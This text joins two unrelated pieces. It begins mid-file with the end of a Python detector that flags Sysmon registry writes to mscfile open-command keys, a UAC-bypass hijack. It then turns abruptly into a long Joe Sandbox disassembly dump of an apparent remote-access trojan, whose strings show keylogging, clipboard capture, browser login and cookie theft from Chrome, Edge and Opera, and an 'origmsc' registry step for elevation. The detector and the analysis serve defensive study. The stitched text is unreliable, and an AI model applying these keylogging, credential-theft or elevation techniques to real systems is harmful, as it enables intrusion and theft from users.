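    """Return one Alert per EID 13 write to a mscfile open-command key that matters."""
    alerts: list[Alert] = []
    for e in events:
        if e.get("EventID") != 13 or not _MSCFILE_TAIL.search(e.get("TargetObject", "")):
            continue
        target, details = e["TargetObject"], e.get("Details", "")
        user_hive = target.upper().startswith("HKU\\")
        stock = details.strip().lower() == STOCK_HANDLER.lower()
        if not user_hive and stock:
            continue  # the normal handler under HKLM/HKCR is what setup and servicing write
        alerts.append(Alert(e["UtcTime"], e["Image"], target, details, "restore" if stock else "hijack"))
    return alerts


def summarize(alerts: list[Alert]) -> list[str]:
    """One line per alert, in event order, for a triage note."""
    return [f"{a.utc_time} {a.kind.upper():7} {a.image} -> {a.target} = {a.command!r}" for a in alerts]


if __name__ == "__main__":
    for line in summarize(detect_mscfile_hijack(SAMPLE_EVENTS)):
        print(line)
```

The restore write is reported deliberately: it carries the same writer image and lands seconds after the hijack, which is the evidence that ties the elevation attempt to the process in the timeline even after the key looks normal again.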
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: CloseCreateValue
                                • String ID: P0F
                                • API String ID: 1818849710-3540264436
                                • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                APIs
                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetLastInputInfo$User32.dll
                                • API String ID: 2574300362-1519888992
                                • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                                • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                • Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                                • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                • Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                                • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                • String ID:
                                • API String ID: 3360349984-0
                                • Opcode ID: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                                • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                                • Opcode Fuzzy Hash: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                                • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                                APIs
                                Strings
                                • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                • Cleared browsers logins and cookies., xrefs: 0040B036
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                APIs
                                  • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                  • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                  • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: H"G$exepath$!G
                                • API String ID: 4119054056-2148977334
                                • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                APIs
                                  • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                  • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                  • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                • Sleep.KERNEL32(000001F4), ref: 0040955A
                                • Sleep.KERNEL32(00000064), ref: 004095F5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                                • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                • Opcode Fuzzy Hash: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                                • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                                • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                • Opcode Fuzzy Hash: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                                • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                  • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                Strings
                                • /sort "Visit Time" /stext ", xrefs: 00404092
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "
                                • API String ID: 368326130-1573945896
                                • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                APIs
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                • API String ID: 1881088180-3686566968
                                • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                APIs
                                • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                • IsWindowVisible.USER32(?), ref: 00415B37
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$TextVisible
                                • String ID: (%G
                                • API String ID: 1670992164-3377777310
                                • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                APIs
                                • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                Strings
                                • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: Connection KeepAlive | Enabled | Timeout:
                                • API String ID: 481472006-507513762
                                • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                • ___raise_securityfailure.LIBCMT ref: 00432E76
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                • String ID: (F
                                • API String ID: 3761405300-3109638091
                                • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i
                                • API String ID: 481472006-2430845779
                                • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: alarm.wav$x(G
                                • API String ID: 1174141254-2413638199
                                • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                APIs
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • CloseHandle.KERNEL32(?), ref: 00409FFD
                                • UnhookWindowsHookEx.USER32 ref: 0040A010
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                                • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                                • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                                • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                                • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                                • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
